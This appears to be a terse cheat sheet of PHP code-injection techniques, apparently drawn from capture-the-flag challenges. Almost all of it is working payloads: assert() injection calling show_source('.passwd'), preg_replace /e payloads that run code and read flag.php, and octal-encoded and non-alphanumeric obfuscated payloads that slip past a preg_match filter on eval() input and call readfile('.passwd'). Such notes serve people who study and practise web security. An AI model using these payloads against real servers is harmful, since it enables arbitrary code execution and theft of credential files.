# The assert() function will execute code in params# Example using challenge
?page=..
Warning : assert() : Assertion "strpos(’includes/...php’, ’..’) === false" failed in path/index.php on line 8# The request looks like this
assert("strpos('includes/' . $_GET['page'] . '.php', '..') === false")# If we inject this
?page=salade.php','..') || print('tomate') || strpos('oignons
# The request will look like
assert("strpos('/includes/salade.php','..') || print('tomate') || strpos('oignons.php','..') ===false")# Then, to exploit
?page=salade.php','..') || show_source('.passwd') || strpos('oignons
PHP preg_replace()
# In PHP, regular expressions need delimiter
preg_match("recherche","contenu");# wrong
preg_match("/recherche/","contenu");# OK# preg_replace offers an option to execute code
preg_replace("input1search","input2replace","input3content");
preg_replace("/a/e","print(123)","abcd");
preg_replace("/a/e","print_r(scandir('.'))","abcd");
preg_replace("/a/e","file_get_contents('flag.php')","abcd");
PHP preg_match()
# It is possible to bypass some functions like preg_match by injecting non-alphanumeric char
# If the application uses eval() on the user input, the payload will still be executed
# Application code
if(!preg_match('/[a-zA-Z`]/', $_POST['input'])){
print '<fieldset><legend>Result</legend>';
eval('print '.$_POST['input'].";");
print '</fieldset>';
}
# Exploitation and Bypass
# You can encode the payload in octal
→ file_get_contents(".passwd")
→ "\146\151\154\145\137\147\145\164\137\143\157\156\164\145\156\164\163"("\056\160\141\163\163\167\144")
# You can also use non alphanumeric char (https://github.com/v1ll41n/Und3rCov3r)
echo -n “phpinfo();” > tmp.php
php Und3rCov3r.ph 1 tmp.php
# If will create an alphax.php file containing the encoded payload
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$______________.$___.$______.$__________.$______________.$___.$______.$___________.$______________.$___.$______.$__________.$______.$___.$______.$__________.$___________.$___.$______.$_________.$___________.$___.$______.$__________.$____________.$___.$__________.$______________.$___.$__________.$______.$___.$____________.$________.'"');$__($_);
# You can then for example read file
→ readfile(".passwd");
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$______________=+_;$______++;$_______++;$_______++;$________++;$________++;$________++;$_________++;$_________++;$_________++;$_________++;$__________++;$__________++;$__________++;$__________++;$__________++;$___________++;$___________++;$___________++;$___________++;$___________++;$___________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;$_____________++;
$__('$_="'.$___.$______.$___________.$_______.$___.$______.$_________.$__________.$___.$______.$_________.$______.$___.$______.$_________.$_________.$___.$______.$_________.$___________.$___.$______.$__________.$______.$___.$______.$__________.$_________.$___.$______.$_________.$__________.$___.$__________.$______________.$___.$_________.$_______.$___.$__________.$___________.$___.$______.$___________.$______________.$___.$______.$_________.$______.$___.$______.$___________.$________.$___.$______.$___________.$________.$___.$______.$___________.$____________.$___.$______.$_________.$_________.$___.$_________.$_______.$___.$__________.$______.$___.$____________.$________.'"');$__($_);